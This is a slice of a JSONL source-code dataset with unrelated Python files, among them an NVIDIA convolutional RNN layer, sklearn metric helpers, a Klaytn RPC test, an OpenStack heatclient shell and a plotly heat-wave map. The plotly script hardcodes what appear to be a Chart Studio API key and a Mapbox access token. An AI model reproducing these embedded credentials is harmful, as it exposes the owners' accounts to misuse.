out","repo_name":"nikitcha/open_parser","sub_path":"open_parser/plos.py","file_name":"plos.py","file_ext":"py","file_size_in_byte":3631,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"20611295071","text":"from __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport keras\n\nimport numpy as np\nfrom nvidia_tao_tf1.core.models.templates.rnn_conv2d_base import RNNConv2dBase\nimport tensorflow as tf\n\n\nclass RNNConv2d(RNNConv2dBase):\n \"\"\"Convolutional RNN Module.\"\"\"\n\n TYPE_NAME = \"RNN\"\n\n def _get_id_init(self):\n return \"glorot_uniform\"\n\n def build(self, input_shapes):\n \"\"\"Builds the RNN module.\n\n NOTE: Subclasses can 
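get_meta in the PLOS retriever collects citation_* meta tags and flattens singleton lists; the extraction itself is a few lines of BeautifulSoup. A sketch on an inline snippet (bs4 assumed installed; html.parser avoids the lxml dependency):

from bs4 import BeautifulSoup

html = """
<meta name="citation_doi" content="10.1371/journal.pone.0000001">
<meta name="citation_author" content="A. Author">
<meta name="citation_author" content="B. Author">
"""
soup = BeautifulSoup(html, "html.parser")

def meta_values(soup, name):
    values = [el.get("content") for el in soup.find_all("meta", {"name": name})]
    return values[0] if len(values) == 1 else values  # scalar when unique

print(meta_values(soup, "citation_doi"))     # 10.1371/journal.pone.0000001
print(meta_values(soup, "citation_author"))  # ['A. Author', 'B. Author']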
modify the initial recurrent matrix by overriding `_get_id_init`.\n \"\"\"\n input_shape = input_shapes[0]\n n_input_shape = self._get_normalized_size(input_shape)\n\n self.W_x = self.add_weight(\n name=\"W_x\",\n shape=[\n self.kernel_size[0],\n self.kernel_size[1],\n n_input_shape[1],\n self.filters,\n ],\n initializer=\"glorot_uniform\",\n trainable=True,\n regularizer=self.kernel_regularizer,\n )\n\n self.W_h = self.add_weight(\n name=\"W_h\",\n shape=self._get_hidden_shape(),\n initializer=self._get_id_init(),\n trainable=True,\n regularizer=self.kernel_regularizer,\n )\n\n self.bias = self.add_weight(\n name=\"bias\",\n shape=self._cvt_to_df([1, self.filters, 1, 1]),\n initializer=\"zeros\",\n trainable=True,\n regularizer=self.bias_regularizer,\n )\n\n super(RNNConv2d, self).build(input_shapes)\n\n def iteration(self, x, state):\n \"\"\"\n Implements the recurrent activation on a single timestep.\n\n Args:\n x (tf.Tensor): The input tensor for the current timestep.\n state (tf.Tensor): The state of the recurrent module, up to the current timestep.\n\n Returns:\n state (tf.Tensor): The state of the recurrent module after processing this timestep.\n \"\"\"\n state = state * self.state_scaling\n\n z = self._conv2d(x, self.W_x) + self._conv2d(state, self.W_h)\n z = self._bias_add(z, self.bias)\n z = self._activation(z, name=\"state_output\" if self.is_export_mode else None)\n\n state = z\n\n return state\n\n def _activation(self, inputs, name=None):\n return keras.layers.Activation(self.activation_type, name=name)(inputs)\n\n\nclass IRNNConv2d(RNNConv2d):\n \"\"\"Convolutional RNN module with identity initialization.\"\"\"\n\n TYPE_NAME = \"IRNN\"\n\n def _get_id_init(self):\n shape = self._get_hidden_shape()\n np_init = 0.01 * np.random.randn(*shape)\n c_y = shape[0] // 2\n c_x = shape[1] // 2\n\n np_init[c_y, c_x, :, :] += np.identity(self.filters)\n\n return tf.compat.v1.initializers.constant(value=np_init)\n\n def _activation(self, inputs, name=None):\n return tf.nn.relu(inputs, name=name)\n","repo_name":"NVIDIA/tao_tensorflow1_backend","sub_path":"nvidia_tao_tf1/core/models/templates/rnn_conv2d.py","file_name":"rnn_conv2d.py","file_ext":"py","file_size_in_byte":2916,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"53"} +{"seq_id":"26898728905","text":"import os\n\nfrom fate_arch.common import file_utils\n\n\ndef get_data_table_count(path):\n count = 0\n config_path = os.path.join(path, \"config.yaml\")\n if not os.path.exists(config_path):\n return count\n config = file_utils.load_yaml_conf(conf_path=config_path)\n if config:\n if config.get(\"type\") != \"vision\":\n raise Exception(f\"can not support this type {config.get('type')}\")\n ext = config.get(\"inputs\").get(\"ext\")\n base_dir = os.path.join(path, \"images\")\n for file_name in os.listdir(base_dir):\n if file_name.endswith(ext):\n count += 1\n return count\n","repo_name":"FederatedAI/FATE","sub_path":"python/fate_arch/common/path_utils.py","file_name":"path_utils.py","file_ext":"py","file_size_in_byte":636,"program_lang":"python","lang":"en","doc_type":"code","stars":5296,"dataset":"github-code","pt":"53"} +{"seq_id":"40621723560","text":"import logging\nfrom sklearn.metrics import accuracy_score\nfrom sklearn import metrics\nimport pandas as pd\nimport sys\n\ndef evalualte(y_test, y_pred, y_pred_score =None):\n accuracy = accuracy_score(y_test, y_pred)\n # score_train = accuracy_score(y_train, y_pred_train)\n if y_pred_score is None:\n fpr, tpr, thresholds = 
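IRNNConv2d above centres an identity matrix in an otherwise small random recurrent kernel; the construction is plain numpy. A standalone sketch mirroring _get_id_init without TensorFlow:

import numpy as np

def identity_recurrent_init(kernel_size, filters, scale=0.01):
    shape = (kernel_size[0], kernel_size[1], filters, filters)
    init = scale * np.random.randn(*shape)  # small random background
    c_y, c_x = shape[0] // 2, shape[1] // 2
    init[c_y, c_x] += np.identity(filters)  # identity at the spatial centre
    return init

w = identity_recurrent_init((3, 3), 4)
print(w.shape)                                         # (3, 3, 4, 4)
print(np.allclose(w[1, 1], np.identity(4), atol=0.2))  # True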
metrics.roc_curve(y_test, y_pred, pos_label=1)\n else:\n fpr, tpr, thresholds = metrics.roc_curve(y_test, y_pred_score, pos_label=1)\n auc = metrics.auc(fpr, tpr)\n # auc2 = metrics.roc_auc_score(y_test, y_pred_score)\n f1 = metrics.f1_score(y_test, y_pred)\n precision = metrics.precision_score(y_test, y_pred)\n recall = metrics.recall_score(y_test, y_pred)\n # logging.info( metrics.classification_report(y_test, y_pred))\n # print '--score: ', accuracy, 'percision: ', percision,'auc1: ', auc, 'f1: ', f1\n from sklearn.metrics import average_precision_score\n aupr = average_precision_score(y_test, y_pred_score)\n # logging.info( '--accuracy: {0:.2f} percision: {1:.2f} auc: {2:.2f} f1: {3:.2f} aupr {4:.2f}'.format(accuracy, precision, auc, f1, aupr) )\n # print ('--------------------------------------------')\n score = {}\n score['accuracy'] = accuracy\n score['precision'] = precision\n score['auc'] = auc\n score['f1'] = f1\n score['aupr'] = aupr\n score['recall'] = recall\n # logging.info(score)\n # score['aupr'] = aupr\n return score\n\n\nimport numpy as np\ndef compute_metrics(p): \n pred, labels = p\n pred = np.argmax(pred, axis=1)\n accuracy = accuracy_score(y_true=labels, y_pred=pred)\n recall = metrics.recall_score(y_true=labels, y_pred=pred)\n precision = metrics.precision_score(y_true=labels, y_pred=pred)\n f1 = metrics.f1_score(y_true=labels, y_pred=pred) \n return {\"accuracy\": accuracy, \"precision\": precision, \"recall\": recall, \"f1\": f1}\n\nif __name__ == \"__main__\":\n filename= sys.argv[1:]\n df = pd.read_csv(filename)\n evalualte(df['truth'], df['pred'], df['score'])","repo_name":"marakeby/clinicalNLP2","sub_path":"utils/evaluate.py","file_name":"evaluate.py","file_ext":"py","file_size_in_byte":2007,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"53"} +{"seq_id":"5296589798","text":"from sys import stdin, stdout\nwhile(True):\n try:\n duration, down_payment, loan, records = map(float, stdin.readline().split())\n except:\n break\n if duration < 0:\n break\n duration = int(duration)\n records = int(records)\n dep_percent = [None] * (duration+1)\n for _ in range(records):\n index, percent = map(float, stdin.readline().split())\n index = int(index)\n dep_percent[index] = percent\n prev_dep = dep_percent[0]\n for x in range(0, duration+1):\n if dep_percent[x] is None:\n dep_percent[x] = prev_dep\n else:\n prev_dep = dep_percent[x]\n \n value = down_payment + loan\n month = 0\n value = value - (dep_percent[month] * value)\n owes = loan\n print(dep_percent)\n print(value, owes)\n while(value < owes):\n month+=1\n value = value - (dep_percent[month] * value)\n owes = owes - down_payment\n print(value, owes)\n if month == 1:\n print(\"1 month\")\n else:\n print(str(month)+ \" months\")","repo_name":"Udit107710/CompetitiveCoding","sub_path":"UVA/10114 - Loansome Car Buyer/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":1048,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"18767875770","text":"import FWCore.ParameterSet.Config as cms\n\nfrom HighMassAnalysis.Skimming.tauSelector_cfi import *\nfrom HighMassAnalysis.Skimming.elecSelector_cfi import *\n\nelecTauPairs = cms.EDProducer(\"DeltaRMinCandCombiner\",\n decay = cms.string('selectedLooseHPSPatTau@+ selectedElectrons@-'),\n checkCharge = cms.bool(False),\n cut = cms.string( ''),\n name = cms.string('etauCandidates'),\n deltaRMin = cms.double(0.3)\n)\n\nselectedElecTauPairs = 
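The evaluation helper above wires together several sklearn metrics, using scores rather than hard labels for the ROC curve when they are available. The same calls on a toy split, so the expected values are visible (scikit-learn assumed installed):

import numpy as np
from sklearn import metrics

y_true = np.array([0, 0, 1, 1])
y_score = np.array([0.1, 0.4, 0.35, 0.8])
y_pred = (y_score >= 0.5).astype(int)

fpr, tpr, _ = metrics.roc_curve(y_true, y_score, pos_label=1)
print("auc ", metrics.auc(fpr, tpr))                             # 0.75
print("f1  ", metrics.f1_score(y_true, y_pred))
print("aupr", metrics.average_precision_score(y_true, y_score))  # ~0.83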
cms.EDFilter(\"CandViewCountFilter\",\n src = cms.InputTag('elecTauPairs'),\n minNumber = cms.uint32(1) \n)\n\nelecTauSkimSequence = cms.Sequence(\n ( selectedLooseHPSPatTau + selectedElectrons )\n * elecTauPairs\n * selectedElecTauPairs\n)\n","repo_name":"amkalsi/ForPriyanka","sub_path":"HighMassAnalysis/Skimming/python/elecTauSkimSequence_cff.py","file_name":"elecTauSkimSequence_cff.py","file_ext":"py","file_size_in_byte":690,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"16463312423","text":"from base.testing import KlaytnBaseTesting\n\n\nclass TestKlayFeeHistory(KlaytnBaseTesting):\n\n def setUp(self) -> None:\n super().setUp()\n self.blockCount = \"0x10\"\n self.lastBlock = \"latest\"\n self.rewardPercentiles = [0.1, 0.2, 0.3]\n\n def test_post(self):\n self.response = self.w3.klay.fee_history(\n self.blockCount, self.lastBlock, self.rewardPercentiles\n )\n self.assertRegex(self.response[\"oldestBlock\"], r'^0x.*$')\n\n def test_post_wrong_with_lack_paramaters(self):\n with self.assertRaises(ValueError):\n self.response = self.w3.klay.fee_history(self.lastBlock)\n","repo_name":"klaytn/web3klaytn","sub_path":"web3rpc/sdk/client/python/openapi-test/test/klay/gas/test_fee_history.py","file_name":"test_fee_history.py","file_ext":"py","file_size_in_byte":646,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"53"} +{"seq_id":"31519740031","text":"import pandas as pd\r\nimport plotly.graph_objects as go\r\nimport chart_studio\r\nimport chart_studio.plotly as py\r\nimport chart_studio.tools as tls\r\ndfhw = pd.read_csv('heatwaves.csv')\r\n\r\nimport plotly.express as px\r\n\r\nusername = 'mlavrenk'\r\napi_key = 'flp8Ee4Nhl0cInQtZ6rt'\r\n\r\nchart_studio.tools.set_credentials_file(username=username, api_key= api_key)\r\n\r\nfig = px.density_mapbox(dfhw, lat='Latitude', lon='Longitude', z='Change', radius=50, center=dict(lat=39.49, lon=-98.95734), zoom =3, mapbox_style=\"stamen-terrain\",)\r\nfig.update_layout(mapbox_style=\"light\", mapbox_accesstoken='pk.eyJ1IjoiYXNod2luZGVzaCIsImEiOiJjbGQ2Nm9jZ2UwZHhyM3FzZGhmZ2U5bGNrIn0.ShkpAMGCM3RNz0SX3If1CQ', margin={\"r\":0,\"l\":0,\"b\":0,\"t\":0},)\r\nduration = px.density_mapbox(dfhw.dropna(subset=['Duration Change']), lat='Latitude', lon='Longitude', z='Duration Change', radius=50, center=dict(lat=39.49, lon=-98.95734), zoom =3, mapbox_style=\"stamen-terrain\", labels={'Duration Change'})\r\nfig.add_trace(duration['data'][0])\r\n\r\nfig.update_coloraxes(colorbar_yanchor=\"top\", colorbar_xanchor=\"left\", colorbar_x=0, colorbar_y=1)\r\n\r\nfig.update_layout(\r\n updatemenus=[\r\n go.layout.Updatemenu(\r\n active=0,\r\n type = 'dropdown',\r\n y = 1,\r\n x=0.7,\r\n buttons=list([\r\n dict(label=\"Intensity Change in Heat Waves\",\r\n method=\"update\",\r\n args=[{\"visible\": [True, False]},\r\n {\"title\": \"Intensity Change\"}]),\r\n\r\n dict(label=\"Duration Change in Heat Waves\",\r\n method=\"update\",\r\n args=[{\"visible\": [False, True]},\r\n {\"title\": \"Duration Change\"}]),\r\n ]),\r\n ),\r\n ]\r\n)\r\n\r\npy.plot(fig, filename = 'heat waves2', auto_open = True)\r\n\r\nfig.show()","repo_name":"tgondil/BoilerMap","sub_path":"main2.py","file_name":"main2.py","file_ext":"py","file_size_in_byte":1849,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"7055327939","text":"# Problem No.: 18783\n# Solver: Jinmin Goh\n# Date: 20200713\n# URL: 
+{"seq_id":"7055327939","text":"# Problem No.: 18783\n# Solver: Jinmin Goh\n# Date: 20200713\n# URL: https://www.acmicpc.net/problem/18783\n\nimport sys\n\ndef main():\n n, m, k = map(int, input().split())\n nums = []\n for _ in range(m):\n nums.append(list(map(int, sys.stdin.readline().split())))\n \n change = [_ + 1 for _ in range(n)]\n #ans = [_ + 1 for _ in range(n)]\n \n # find final change result for single m-process\n for i in range(m):\n temp = list(reversed(change[nums[i][0] - 1:nums[i][1]]))\n change[nums[i][0] - 1:nums[i][1]] = temp\n #print(change)\n\n changeList = [None] * n # list of changing sequences for each number\n cycleList = [] # list of cycles\n for i in range(n):\n if changeList[i] is not None:\n continue\n # find cycle\n start = i + 1\n tempCycle = [start]\n temp = change[start - 1]\n #print(start, tempCycle, temp)\n while temp != start:\n tempCycle.append(temp)\n temp = change[temp - 1]\n #print(tempCycle)\n # add change list\n cycleList.append(tempCycle[:])\n for j in range(len(tempCycle)):\n changeList[tempCycle[j] - 1] = [j, len(cycleList) - 1]\n \n for i in range(n):\n print(cycleList[changeList[i][1]][(changeList[i][0] + k) % len(cycleList[changeList[i][1]])])\n \n return\n\nif __name__ == \"__main__\":\n main()","repo_name":"Jinmin-Goh/BOJ_PS","sub_path":"Solved/18783/18783.py","file_name":"18783.py","file_ext":"py","file_size_in_byte":1405,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"35225303903","text":"import os \nimport json\nimport numpy as np \n\n\n_obj = open(os.path.join(os.path.dirname(__file__),\"data_folder\", \"all_widths.json\"),'rt')\nwidth_dict = json.load(_obj)\n_obj.close()\n\ndef get_width(param, mode):\n subdict = width_dict[param]\n for entry in subdict:\n if str(mode).lower()==entry[\"mode0\"]:\n return entry[\"width\"]\n # no matching entry was found; fail loudly with the offending mode\n raise Exception(f\"no width entry for mode {mode} in {param}\")\n\ncor_file = os.path.join(os.path.dirname(__file__), \"data_folder\", \"ice_covariance.json\")\n_obj = open(cor_file, 'rt')\ncor_dict = json.load(_obj)\n_obj.close()\n\nparam_types = [\"Amp\", \"Phs\"]\nmodes = [0,1,2,3,4]\nall_widths = []\nfor param in param_types:\n for mode in modes:\n if param==\"Phs\" and mode==0:\n continue\n all_widths.append( get_width(param, mode) )\nall_widths = np.array(all_widths)\n\n# load correlation matrix in \ncorrelation = np.zeros(shape=(9,9))\nfor i, key in enumerate(cor_dict.keys()):\n for j, subkey in enumerate(cor_dict.keys()):\n correlation[i][j] = cor_dict[key][subkey] ","repo_name":"BenSmithers/universalGradients","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1060,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"4395574259","text":"# Licensed under the Apache License, Version 2.0 (the \"License\"); you may\n# not use this file except in compliance with the License. You may obtain\n# a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT\n# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 
See the\n# License for the specific language governing permissions and limitations\n# under the License.\n\n\"\"\"\nCommand-line interface to the Heat API.\n\"\"\"\n\nimport argparse\nimport logging\nimport sys\n\nfrom keystoneauth1.identity import generic\nfrom keystoneauth1 import session as kssession\nfrom oslo_utils import encodeutils\nfrom oslo_utils import importutils\n\nimport heatclient\nfrom heatclient._i18n import _\nfrom heatclient import client as heat_client\nfrom heatclient.common import utils\nfrom heatclient import exc\n\nosprofiler_profiler = importutils.try_import(\"osprofiler.profiler\")\n\n\nclass HeatShell(object):\n\n def _append_global_identity_args(self, parser):\n # FIXME(gyee): these are global identity (Keystone) arguments which\n # should be consistent and shared by all service clients. Therefore,\n # they should be provided by python-keystoneclient. We will need to\n # refactor this code once this functionality is available in\n # python-keystoneclient.\n parser.add_argument(\n '-k', '--insecure', default=False, action='store_true',\n help=_('Explicitly allow heatclient to perform '\n '\\\"insecure SSL\\\" (https) requests. '\n 'The server\\'s certificate will not be verified '\n 'against any certificate authorities. '\n 'This option should be used with caution.'))\n\n parser.add_argument(\n '--os-cert',\n default=utils.env('OS_CERT'),\n help=_('Path of certificate file to use in SSL connection. '\n 'This file can optionally be prepended with '\n 'the private key.'))\n\n # for backward compatibility only\n parser.add_argument('--cert-file',\n dest='os_cert',\n help=_('DEPRECATED! Use %(arg)s.') %\n {'arg': '--os-cert'})\n\n parser.add_argument('--os-key',\n default=utils.env('OS_KEY'),\n help=_('Path of client key to use in SSL '\n 'connection. This option is not necessary '\n 'if your key is prepended to your cert '\n 'file.'))\n\n parser.add_argument('--key-file',\n dest='os_key',\n help=_('DEPRECATED! Use %(arg)s.') %\n {'arg': '--os-key'})\n\n parser.add_argument('--os-cacert',\n metavar='',\n dest='os_cacert',\n default=utils.env('OS_CACERT'),\n help=_('Path of CA TLS certificate(s) used to '\n 'verify the remote server\\'s certificate. '\n 'Without this option glance looks for the '\n 'default system CA certificates.'))\n\n parser.add_argument('--ca-file',\n dest='os_cacert',\n help=_('DEPRECATED! Use %(arg)s.') %\n {'arg': '--os-cacert'})\n\n parser.add_argument('--os-username',\n default=utils.env('OS_USERNAME'),\n help=_('Defaults to %(value)s.') % {\n 'value': 'env[OS_USERNAME]'\n })\n\n parser.add_argument('--os_username',\n help=argparse.SUPPRESS)\n\n parser.add_argument('--os-user-id',\n default=utils.env('OS_USER_ID'),\n help=_('Defaults to %(value)s.') % {\n 'value': 'env[OS_USER_ID]'\n })\n\n parser.add_argument('--os_user_id',\n help=argparse.SUPPRESS)\n\n parser.add_argument('--os-user-domain-id',\n default=utils.env('OS_USER_DOMAIN_ID'),\n help=_('Defaults to %(value)s.') % {\n 'value': 'env[OS_USER_DOMAIN_ID]'\n })\n\n parser.add_argument('--os_user_domain_id',\n help=argparse.SUPPRESS)\n\n parser.add_argument('--os-user-domain-name',\n default=utils.env('OS_USER_DOMAIN_NAME'),\n help=_('Defaults to %(value)s.') % {\n 'value': 'env[OS_USER_DOMAIN_NAME]'\n })\n\n parser.add_argument('--os_user_domain_name',\n help=argparse.SUPPRESS)\n\n parser.add_argument('--os-project-id',\n default=utils.env('OS_PROJECT_ID'),\n help=(_('Another way to specify tenant ID. '\n 'This option is mutually exclusive with '\n '%(arg)s. 
Defaults to %(value)s.') %\n {\n 'arg': '--os-tenant-id',\n 'value': 'env[OS_PROJECT_ID]'}))\n\n parser.add_argument('--os_project_id',\n help=argparse.SUPPRESS)\n\n parser.add_argument('--os-project-name',\n default=utils.env('OS_PROJECT_NAME'),\n help=(_('Another way to specify tenant name. '\n 'This option is mutually exclusive with '\n '%(arg)s. Defaults to %(value)s.') %\n {\n 'arg': '--os-tenant-name',\n 'value': 'env[OS_PROJECT_NAME]'}))\n\n parser.add_argument('--os_project_name',\n help=argparse.SUPPRESS)\n\n parser.add_argument('--os-project-domain-id',\n default=utils.env('OS_PROJECT_DOMAIN_ID'),\n help=_('Defaults to %(value)s.') % {\n 'value': 'env[OS_PROJECT_DOMAIN_ID]'\n })\n\n parser.add_argument('--os_project_domain_id',\n help=argparse.SUPPRESS)\n\n parser.add_argument('--os-project-domain-name',\n default=utils.env('OS_PROJECT_DOMAIN_NAME'),\n help=_('Defaults to %(value)s.') % {\n 'value': 'env[OS_PROJECT_DOMAIN_NAME]'\n })\n\n parser.add_argument('--os_project_domain_name',\n help=argparse.SUPPRESS)\n\n parser.add_argument('--os-password',\n default=utils.env('OS_PASSWORD'),\n help=_('Defaults to %(value)s.') % {\n 'value': 'env[OS_PASSWORD]'\n })\n\n parser.add_argument('--os_password',\n help=argparse.SUPPRESS)\n\n parser.add_argument('--os-tenant-id',\n default=utils.env('OS_TENANT_ID'),\n help=_('Defaults to %(value)s.') % {\n 'value': 'env[OS_TENANT_ID]'\n })\n\n parser.add_argument('--os_tenant_id',\n default=utils.env('OS_TENANT_ID'),\n help=argparse.SUPPRESS)\n\n parser.add_argument('--os-tenant-name',\n default=utils.env('OS_TENANT_NAME'),\n help=_('Defaults to %(value)s.') % {\n 'value': 'env[OS_TENANT_NAME]'\n })\n\n parser.add_argument('--os_tenant_name',\n default=utils.env('OS_TENANT_NAME'),\n help=argparse.SUPPRESS)\n\n parser.add_argument('--os-auth-url',\n default=utils.env('OS_AUTH_URL'),\n help=_('Defaults to %(value)s.') % {\n 'value': 'env[OS_AUTH_URL]'\n })\n\n parser.add_argument('--os_auth_url',\n help=argparse.SUPPRESS)\n\n parser.add_argument('--os-region-name',\n default=utils.env('OS_REGION_NAME'),\n help=_('Defaults to %(value)s.') % {\n 'value': 'env[OS_REGION_NAME]'\n })\n\n parser.add_argument('--os_region_name',\n help=argparse.SUPPRESS)\n\n parser.add_argument('--os-auth-token',\n default=utils.env('OS_AUTH_TOKEN'),\n help=_('Defaults to %(value)s.') % {\n 'value': 'env[OS_AUTH_TOKEN]'\n })\n\n parser.add_argument('--os_auth_token',\n help=argparse.SUPPRESS)\n\n parser.add_argument('--os-service-type',\n default=utils.env('OS_SERVICE_TYPE'),\n help=_('Defaults to %(value)s.') % {\n 'value': 'env[OS_SERVICE_TYPE]'\n })\n\n parser.add_argument('--os_service_type',\n help=argparse.SUPPRESS)\n\n parser.add_argument('--os-endpoint-type',\n default=utils.env('OS_ENDPOINT_TYPE'),\n help=_('Defaults to %(value)s.') % {\n 'value': 'env[OS_ENDPOINT_TYPE]'\n })\n\n parser.add_argument('--os_endpoint_type',\n help=argparse.SUPPRESS)\n\n def get_base_parser(self):\n parser = argparse.ArgumentParser(\n prog='heat',\n description=__doc__.strip(),\n epilog=_('See \"%(arg)s\" for help on a specific command.') % {\n 'arg': 'heat help COMMAND'\n },\n add_help=False,\n formatter_class=HelpFormatter,\n )\n\n # Global arguments\n parser.add_argument('-h', '--help',\n action='store_true',\n help=argparse.SUPPRESS)\n\n parser.add_argument('--version',\n action='version',\n version=heatclient.__version__,\n help=_(\"Shows the client version and exits.\"))\n\n parser.add_argument('-d', '--debug',\n default=bool(utils.env('HEATCLIENT_DEBUG')),\n 
action='store_true',\n help=_('Defaults to %(value)s.') % {\n 'value': 'env[HEATCLIENT_DEBUG]'\n })\n\n parser.add_argument('-v', '--verbose',\n default=False, action=\"store_true\",\n help=_(\"Print more verbose output.\"))\n\n parser.add_argument('--api-timeout',\n help=_('Number of seconds to wait for an '\n 'API response, '\n 'defaults to system socket timeout'))\n\n # os-no-client-auth tells heatclient to use token, instead of\n # env[OS_AUTH_URL]\n parser.add_argument('--os-no-client-auth',\n default=utils.env('OS_NO_CLIENT_AUTH'),\n action='store_true',\n help=(_(\"Do not contact keystone for a token. \"\n \"Defaults to %(value)s.\") %\n {'value': 'env[OS_NO_CLIENT_AUTH]'}))\n\n parser.add_argument('--heat-url',\n default=utils.env('HEAT_URL'),\n help=_('Defaults to %(value)s.') % {\n 'value': 'env[HEAT_URL]'\n })\n\n parser.add_argument('--heat_url',\n help=argparse.SUPPRESS)\n\n parser.add_argument('--heat-api-version',\n default=utils.env('HEAT_API_VERSION', default='1'),\n help=_('Defaults to %(value)s or 1.') % {\n 'value': 'env[HEAT_API_VERSION]'\n })\n\n parser.add_argument('--heat_api_version',\n help=argparse.SUPPRESS)\n\n # This unused option should remain so that scripts that\n # use it do not break. It is suppressed so it will not\n # appear in the help.\n parser.add_argument('-t', '--token-only',\n default=bool(False),\n action='store_true',\n help=argparse.SUPPRESS)\n\n parser.add_argument('--include-password',\n default=bool(utils.env('HEAT_INCLUDE_PASSWORD')),\n action='store_true',\n help=_('Send %(arg1)s and %(arg2)s to heat.') % {\n 'arg1': 'os-username',\n 'arg2': 'os-password'\n })\n\n # FIXME(gyee): this method should come from python-keystoneclient.\n # Will refactor this code once it is available.\n # https://bugs.launchpad.net/python-keystoneclient/+bug/1332337\n\n self._append_global_identity_args(parser)\n\n if osprofiler_profiler:\n parser.add_argument(\n '--profile',\n metavar='HMAC_KEY',\n help=_('HMAC key to use for encrypting context data '\n 'for performance profiling of operation. '\n 'This key should be the value of HMAC key '\n 'configured in osprofiler middleware in heat, '\n 'it is specified in the paste configuration '\n '(/etc/heat/api-paste.ini). 
Without the key, '\n 'profiling will not be triggered '\n 'even if osprofiler is enabled on server side.'))\n return parser\n\n def get_subcommand_parser(self, version):\n parser = self.get_base_parser()\n\n self.subcommands = {}\n subparsers = parser.add_subparsers(metavar='')\n submodule = importutils.import_versioned_module('heatclient',\n version, 'shell')\n self._find_actions(subparsers, submodule)\n self._find_actions(subparsers, self)\n self._add_bash_completion_subparser(subparsers)\n\n return parser\n\n def _add_bash_completion_subparser(self, subparsers):\n subparser = subparsers.add_parser(\n 'bash_completion',\n add_help=False,\n formatter_class=HelpFormatter\n )\n self.subcommands['bash_completion'] = subparser\n subparser.set_defaults(func=self.do_bash_completion)\n\n def _find_actions(self, subparsers, actions_module):\n for attr in (a for a in dir(actions_module) if a.startswith('do_')):\n # I prefer to be hyphen-separated instead of underscores.\n command = attr[3:].replace('_', '-')\n callback = getattr(actions_module, attr)\n desc = callback.__doc__ or ''\n help = desc.strip().split('\\n')[0]\n arguments = getattr(callback, 'arguments', [])\n\n subparser = subparsers.add_parser(command,\n help=help,\n description=desc,\n add_help=False,\n formatter_class=HelpFormatter)\n subparser.add_argument('-h', '--help',\n action='help',\n help=argparse.SUPPRESS)\n self.subcommands[command] = subparser\n for (args, kwargs) in arguments:\n subparser.add_argument(*args, **kwargs)\n subparser.set_defaults(func=callback)\n\n def _setup_logging(self, debug):\n log_lvl = logging.DEBUG if debug else logging.WARNING\n logging.basicConfig(\n format=\"%(levelname)s (%(module)s) %(message)s\",\n level=log_lvl)\n logging.getLogger('iso8601').setLevel(logging.WARNING)\n logging.getLogger('urllib3.connectionpool').setLevel(logging.WARNING)\n\n def _setup_verbose(self, verbose):\n if verbose:\n exc.verbose = 1\n\n def _get_keystone_session(self, **kwargs):\n # first create a Keystone session\n cacert = kwargs.pop('cacert', None)\n cert = kwargs.pop('cert', None)\n key = kwargs.pop('key', None)\n insecure = kwargs.pop('insecure', False)\n timeout = kwargs.pop('timeout', None)\n verify = kwargs.pop('verify', None)\n\n if verify is None:\n if insecure:\n verify = False\n else:\n # TODO(gyee): should we do\n # heatclient.common.http.get_system_ca_fle()?\n verify = cacert or True\n if cert and key:\n # passing cert and key together is deprecated in favour of the\n # requests lib form of having the cert and key as a tuple\n cert = (cert, key)\n\n return kssession.Session(verify=verify, cert=cert, timeout=timeout)\n\n def main(self, argv):\n # Parse args once to find version\n parser = self.get_base_parser()\n (options, args) = parser.parse_known_args(argv)\n self._setup_logging(options.debug)\n self._setup_verbose(options.verbose)\n\n # build available subcommands based on version\n api_version = options.heat_api_version\n subcommand_parser = self.get_subcommand_parser(api_version)\n self.parser = subcommand_parser\n\n # Handle top-level --help/-h before attempting to parse\n # a command off the command line\n if not args and options.help or not argv:\n self.do_help(options)\n return 0\n\n # Parse args again and call whatever callback was selected\n args = subcommand_parser.parse_args(argv)\n\n # Short-circuit and deal with help command right away.\n if args.func == self.do_help:\n self.do_help(args)\n return 0\n elif args.func == self.do_bash_completion:\n self.do_bash_completion(args)\n return 0\n\n 
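        # Note: the validation below mirrors the standard OpenStack CLI
        # credential fallback chain -- each required value may come from an
        # explicit flag (e.g. --os-username) or its environment variable
        # (e.g. env[OS_USERNAME]), and an auth token (--os-auth-token /
        # env[OS_AUTH_TOKEN]) may stand in for the username/password pair.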
if not args.os_username and not args.os_auth_token:\n raise exc.CommandError(_(\"You must provide a username via either \"\n \"--os-username or env[OS_USERNAME] \"\n \"or a token via --os-auth-token or \"\n \"env[OS_AUTH_TOKEN]\"))\n\n if not args.os_password and not args.os_auth_token:\n raise exc.CommandError(_(\"You must provide a password via either \"\n \"--os-password or env[OS_PASSWORD] \"\n \"or a token via --os-auth-token or \"\n \"env[OS_AUTH_TOKEN]\"))\n\n if args.os_no_client_auth:\n if not args.heat_url:\n raise exc.CommandError(_(\"If you specify --os-no-client-auth \"\n \"you must also specify a Heat API \"\n \"URL via either --heat-url or \"\n \"env[HEAT_URL]\"))\n else:\n # Tenant/project name or ID is needed to make keystoneclient\n # retrieve a service catalog, it's not required if\n # os_no_client_auth is specified, neither is the auth URL\n\n if not (args.os_tenant_id or args.os_tenant_name or\n args.os_project_id or args.os_project_name):\n raise exc.CommandError(\n _(\"You must provide a tenant id via either \"\n \"--os-tenant-id or env[OS_TENANT_ID] or a tenant name \"\n \"via either --os-tenant-name or env[OS_TENANT_NAME] \"\n \"or a project id via either --os-project-id or \"\n \"env[OS_PROJECT_ID] or a project name via \"\n \"either --os-project-name or 